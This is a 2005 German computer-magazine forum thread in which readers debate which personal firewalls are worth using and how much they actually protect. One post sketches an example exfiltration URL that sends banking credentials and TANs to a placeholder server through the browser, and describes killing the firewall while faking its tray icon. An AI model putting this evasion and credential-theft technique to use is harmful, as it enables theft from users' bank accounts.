Firewalls

Dieses Thema im Forum "Heft: Fragen zur aktuellen PC-WELT" wurde erstellt von Trotzkopf, 9. Februar 2005.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Trotzkopf

    Trotzkopf Byte

    Registriert seit:
    9. Februar 2005
    Beiträge:
    32
    Als einfache Userin fand ich den Artikel "Tipps zu Firewalls" sehr interessant und verständlich.
    Aber was ist von den Firewalls wie "Sygate" und "Norton Personal "Firewall" zu halten?
    Und ist es überhaupt sinnvoll eine fast 1 Jahr alte Version von McAfee auf den PC zu laden?

    Liebe Grüsse,
    Trotzkopf
     
  2. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
  3. Hoshy

    Hoshy Kbyte

    Registriert seit:
    10. November 2004
    Beiträge:
    131
    Was immer gerne übersehen wird: Personal Firewalls blocken auch Verbindungsversuche von Programmen, die ich auf meiner Festplatte installiert habe.

    Wenn ich also nicht möchte, dass alle möglichen Programme ohne mein Wissen "nach Hause telefonieren", installier' ich mir 'ne Firewall :)
     
  4. Bischof

    Bischof Byte

    Registriert seit:
    17. April 2004
    Beiträge:
    119
    Was immer gerne übersehen wird: Personal Firewalls blocken auch Verbindungsversuche von "freundlichen Programmen", die sich "blocken lassen".

    Alles andere geht an der FW vorbei.
     
  5. deoroller

    deoroller Wandelndes Forum

    Registriert seit:
    18. Juli 2000
    Beiträge:
    116.590
    Das Dumme an den Tests ist, dass am Ende doch irgendwelche PFW empfohlen wird, auch wenn keine empfehlenswert ist, weil das Sichrheitskonzept von Windows mangelhaft ist.
    Daran können die Hersteller von PFW nichts.
    Sie sollten aber die User nicht für dumm verkaufen und nur das zusagen, was machbar ist.

    Wie alt eine PFT ist, spielt kaum eine Rolle, da sie keinerlei Schutz gegen Viren bietet. Es wird nicht viel mehr als "Modellpflege" betrieben.

    Ich habe nicht das PCW-Heft gelesen, aber den Test einer anderen Zeitschrift, auf deren Heft-CD das PFW-Seminar des Computer Choas Clubs drauf ist. 89 Minuten Video empfehlenswert!
    Was PFT-Hersteller versprechen und was davon zutrifft.
     
  6. Thor Branke

    Thor Branke CD-R 80

    Registriert seit:
    8. Februar 2005
    Beiträge:
    9.482
    Moin,

    da sind auf der CD der aktuellen PC-Welt ja gleich drei Firewalls untergebracht. Ich frage mich, was das soll.

    Zuallererst MacAfee als Vollversions-Schmankerl, Zone Alarm ist die Hausmarke und Sygate hat die Rolle des "Ich darf auch mal...!" (Artikel "Spionagetreiben" Seite 118-119).

    Wer da wenig Ahnung und noch keine Firewall installiert hat, wundert sich mächtig: jede sei toll, jede hat irgendwann mal irgendwas gewonnen usw. .

    Warum ist die sygate-wall nun plötzlich das Werkzeug, um die Lexmark-Spione auszutricksen, während auf vielen Seiten zuvor für die anderen Brandmauern geworben wird?

    Kleiner Fall von fehlender Abstimmung unter den Redakteuren? Oder gibt es wirklich wichtige Unterschiede (abgesehen von konfigurierbar - nicht konfigurierbar)?

    In jedem Fall: egal, was oben steht, ohne Firewall ins Netz zu gehen, ist sträflicher Leichtsinn. Jedes Programm ist bei ausreichender Motivation (= "kriminelle Energie") und angeeigneter Programmierkenntnis zu schädigen oder für eigene Zwecke auszunutzen. Man muss es den Leuten ja aber auch nicht leichter machen, als unbedingt nötig. Wer halbwegs seine Sinne beisammen hat, verzichtet ja auch nicht aufs Kondom, nur weil welche schon mal gerissen sind...

    Safer Sex and Surf Save! ;)
    Thor
     
  7. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
    Warum?

    ......
     
  8. Trotzkopf

    Trotzkopf Byte

    Registriert seit:
    9. Februar 2005
    Beiträge:
    32
    Die von TheD0CT0R vorgeschlagenen Sites fand ich ganz interessant.

    Aber ich muß Thor Branke rechtgeben: ohne Firewall würde ich auch nicht ins Netz gehen; ist ja so als ob ich mein Haus unversperrt lasse und es somit den Einbrechern leichter machen würde.

    Und mit einer Firewall kann ich zumindest kontrollieren, welche Dienste nach draußen gehen. Ist ja auch schon was.

    Die Frage ist nur: mit welcher PFW? Sind alle gleich gut oder alle gleich schlecht?
    Ich hatte bereits Zone Alarm am PC und hatte beim letzten Up-Date Riesenprobleme mit der Software. Sie ließ sich nicht mal mehr deinstallieren.

    Liebe Grüße vom Trotzkopf
     
  9. Zeitung

    Zeitung Byte

    Registriert seit:
    26. Januar 2003
    Beiträge:
    53
    Die Beiträge sind für einen normalen Anwender sehr informativ und aufschlußreich.
    Auf meinem PC hatte ich "Buhl Data Firewall 2004 Professional" installiert. Preis: € 50,--. Kürzlich erschien die Version 2005, die ich als registrierter Benutzer um ein Drittel billiger erwerben konnte. Immer noch ein stolzer Preis für ein Programm, das dem Anwender große Sicherheit vor Angriffen aus dem Netz verspricht (vorgaukelt), die zum einem, wie sich aus den Forumsbeiträgen und den Links von TheDOCTOR unschwer entnehmen läßt, wohl doch nicht vorliegt. Zum anderen wurde das Programm in der neuen Ausgabe der Computerbild auf "mangelhaft" abgewertet, weil sich die Software von gefährlichen Schädlingsprogrammen lahmlegen läßt.

    Trotzdem bin ich mit dem Programm zufrieden: Es läßt sich auch ohne Vorkenntnisse leicht installieren, die Grundfunktionen sind ebenfalls leicht bedienbar und bietet doch eine gewisse Sicherheit. Den Preis für die Software finde ich zu hoch.

    Es ist zu hoffen, dass der Hersteller möglichst bald ein Update herausbringt, welches das vorgenannte Sicherheitsloch stopft.
     
  10. steppl

    steppl Halbes Gigabyte

    Registriert seit:
    30. Juni 2004
    Beiträge:
    6.613
    Die Sicherheit steht und fällt mit den aktiven Diensten. Kein Dienst-kein offener Port-oder anders gesagt: keine Tür zum reingehen. Und das alles ohne software...
    Schon. Aber 90 % der Anwender sind nun mal eher Laien, was das angeht, da rechne ich mich mit dazu. Und was der Laie tut, wenn "c62yxkx.dll" 10mal hintereinander aufs Netz zugreifen will, ist klar: "Hör auf zu nerven, da hast du den Zugang...".

    Ansonsten schliesse ich mich dem beitrag von deoroller an. Ich habe diesen Beitrag in der aktuellen "PC Professionell" gelesen. Ich kann nur sagen: Au Weia.....
     
  11. steppl

    steppl Halbes Gigabyte

    Registriert seit:
    30. Juni 2004
    Beiträge:
    6.613
  12. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    oh man, wie lange hält sich denn dieses märchen denn noch :rolleyes:

    wenn ich als programmierer eine info rausschicken will, dann schicke ich die raus ohne dass die firewall auch nur mitkriegt, dass da was am dampfen ist.

    einfachste möglichkeit: das proggy fragt höflich an, ob es nach updates gesuchen / sich registrieren / etc darf. user sagt ja, schaltet die firewall auf grün und los gehts.

    genauso einfach: das proggy bittet den standardbrowser
    HTML:
    http://www.myserver.de/spyscript.php?Bank=etc&UserName=abc&Passwort=xyz&TanList=123;456;789
    zu öffnen, diese seite leitet sofort weiter auf (das unverdächtige) http://www.myserver.de/update

    dafür bracht das proggy keinerlei erhöhte rechte! ein 08/15-standarduser reicht aus. stehen adminrechte zur verfügung (~95% aller home-pcs-surf-user!) kann die lästige firewall über systemcalls gekillt werden und wenn das proggy gut ist wird das zugehörige icon im tray dupliziert -> user merkt nichts.
     
  13. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
    @ Michi0815

    Gibs auf, diese ganzen Argumente ziehn doch eh net bei den ganzen Leuten vom Typ "Ich will net dass M$ mich ausspioniert". Wer an die M$-Spionage glaubt der glaubt auch an die Firewall-Märchen.
     
  14. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    manchmal habe ich eben diese anfälle :rolleyes:

    bin aber in behandlung :D
     
  15. steppl

    steppl Halbes Gigabyte

    Registriert seit:
    30. Juni 2004
    Beiträge:
    6.613
    @Mich0815
    Dein obiger Beitrag klang so, als wüdest du Geld damit verdienen :D
     
  16. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    wär' schön, aber ich bin in einer anderen sparte (mit weit geringeren "erfolgsprämien") tätig :D

    hab' mich nur mal spasseshalber mit firewall-spielerein beschäftigt. als die firewalls grade "modern" wurden war es wirklich sträflich einfach sie zu umgehen - und zumindest die ersten beiden möglichkeiten gehen mit sicherheit immer noch ;)
     
  17. Thor Branke

    Thor Branke CD-R 80

    Registriert seit:
    8. Februar 2005
    Beiträge:
    9.482
    Moin The D0CT0R, moin Trotzkopf,

    es ist deshalb sträflicher Leichtsinn, weil noch sehr viel Malware im Netz kursiert, die nicht über die Fähigkeiten verfügt, eine Firewall niederzubügeln oder auszutricksen.

    Da ich von einer Firewall keinen 100%igen Schutz erwarte, genügen mir nun einmal eben 80, 70, 60%. In Kombination mit anderen Programmen und einem wachen Kopf kann ich mir so das Meiste vom Leib halten.

    Malware ist immer das Produkt aus Motivation und Möglichkeiten. Fehlt die Motivation ("Ruhm", Geld, Wut etc), läuft die Technik ins Leere, und umgekehrt.

    Es gibt weit mehr Möglichkeiten, den Rechner abzusichern. Keine bietet 100%igen Schutz (gute, aber wenig verbreitete Programme (= kein Angriffsziel, da kein Markenname - bis vor kurzem z.B. Firefox - würde trotz aller Vorzüge sofort auf einen nur wenig schlechteren Browser umsteigen, falls der jemals die Verbreitung des IE heute findet; Dienste einstellen, Antivirenprogramm, Autostartwächter, Anti-Dialer, Updates und ein wacher Kopf und Selbstdisziplin bei der Pflege des eigenen PC's (BackUps)), aber alle zusammen können das Leben eines Crackers schwerer machen.

    Immerhin bekommt man so wenigstens mit, dass irgendetwas nicht stimmt. Früher oder später. Bitte nicht jedes Programm für sich sehen, sondern auf Kombination setzen. Und nicht Unmögliches erwarten.

    Dann kann man sich auch als reiner Programmanwender eine ganze Weile an seinem System erfreuen.

    All the Best,
    der Thor ;-)
     
  18. TheD0CT0R

    TheD0CT0R Dr. h.c. Mod

    Registriert seit:
    2. Dezember 2003
    Beiträge:
    17.262
    @ Thor Branke

    Das is die richtige Einstellung. Die Firewall als einen Baustein unter vielen ansehn (vor allem Brain 2.0) und sich wohl bewußt sein dass sie kein Allheilmittel ist.

    Genau um das klarzustellen hab ich nochmal nachgefragt, denn einfach nur sagen "ohne ist Leichtsinn", das is ein bisschen wenig, das klang so nach "Firewall alleine hilft gegen alles und ohne ist man völlig schutzlos".

    ;) :D
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen